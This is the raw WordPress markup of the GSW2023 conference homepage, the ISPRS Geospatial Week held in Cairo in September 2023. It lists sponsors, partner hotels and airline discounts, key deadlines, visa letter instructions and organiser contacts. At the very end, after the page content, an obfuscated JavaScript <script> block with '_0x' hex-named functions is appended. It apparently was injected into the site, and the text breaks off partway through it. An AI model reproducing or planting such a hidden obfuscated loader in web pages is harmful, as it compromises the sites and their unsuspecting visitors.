href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 